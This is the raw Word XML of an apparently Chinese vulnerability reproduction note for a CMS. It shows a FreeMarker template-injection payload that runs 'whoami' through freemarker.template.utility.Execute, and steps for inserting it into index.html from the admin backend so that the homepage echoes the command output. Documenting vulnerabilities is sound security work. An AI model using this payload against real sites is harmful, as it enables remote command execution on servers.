          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>${"</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E244D5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>freemarker.template.utility.Execute"?new()("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E244D5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>")}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="67ED1AF5" w14:textId="27C1F5F8" w:rsidR="00C54286" w:rsidRDefault="00C54286" w:rsidP="00E244D5">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A37D62F" w14:textId="1754526F" w:rsidR="00C54286" w:rsidRDefault="00C54286" w:rsidP="00C54286">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C54286">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B76CEC6" w14:textId="545A815D" w:rsidR="00C54286" w:rsidRPr="00C54286" w:rsidRDefault="00C54286" w:rsidP="00C54286">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C54286">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>登录进入后台，修改默认的index.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，添加payload后保存。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40741A72" w14:textId="3510AE8B" w:rsidR="00C54286" w:rsidRDefault="00C54286" w:rsidP="00C54286">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C54286">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:noProof/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C04CCCE" wp14:editId="2F9A57ED">
            <wp:extent cx="5274310" cy="2907665"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="34571754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7544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2D83" w14:textId="45EF43E3" w:rsidR="00C54286" w:rsidRPr="00C54286" w:rsidRDefault="00C54286" w:rsidP="00C54286">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C54286">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>来到默认的首页index</w:t>
      </w:r>
      <w:r w:rsidR="00DB1C8A">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（鼠标滚轮往上滑）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，可以看到已经回显了命令执行结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A7A810" w14:textId="06E8E7E1" w:rsidR="00C54286" w:rsidRDefault="00C54286" w:rsidP="00C54286">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30145C5C" wp14:editId="07BB9C9E">
            <wp:extent cx="5274310" cy="3080385"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="201845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5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6C29" w14:textId="763ED47A" w:rsidR="00C54286" w:rsidRDefault="00C54286" w:rsidP="00C54286">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C54286">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Linux同样</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E573D8" w14:textId="7E98A755" w:rsidR="00C54286" w:rsidRPr="00C54286" w:rsidRDefault="00C54286" w:rsidP="00C54286">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线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587305" wp14:editId="2FD4910F">
            <wp:extent cx="5274310" cy="3086100"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1223851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51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286" w:rsidRPr="00C54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85"/>
    <w:rsid w:val="000611D6"/>
    <w:rsid w:val="00080555"/>
    <w:rsid w:val="001258BB"/>
    <w:rsid w:val="00232D7D"/>
    <w:rsid w:val="0028425F"/>
    <w:rsid w:val="00425997"/>
    <w:rsid w:val="004C1D3A"/>
    <w:rsid w:val="00561C02"/>
    <w:rsid w:val="00585808"/>
    <w:rsid w:val="007D36D3"/>
    <w:rsid w:val="009278F2"/>
    <w:rsid w:val="00950C42"/>
    <w:rsid w:val="00C54286"/>
    <w:rsid w:val="00C95310"/>
    <w:rsid w:val="00CF0D92"/>
    <w:rsid w:val="00CF533E"/>
    <w:rsid w:val="00D2667C"/>
    <w:rsid w:val="00DB1C8A"/>
    <w:rsid w:val="00DD6B31"/>
    <w:rsid w:val="00DE4985"/>
    <w:rsid w:val="00E244D5"/>
    <w:rsid w:val="00FD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8296"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E6BDC977-CE2E-41B1-924F-362B6AE7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1C0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49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9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9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9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9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9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9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49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4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4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49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49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49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49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49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49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49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9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4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4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9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9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49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49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F533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533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F53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ee.com/dromara/ujcm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c</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>xiao c</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-18T03:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-18T07:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>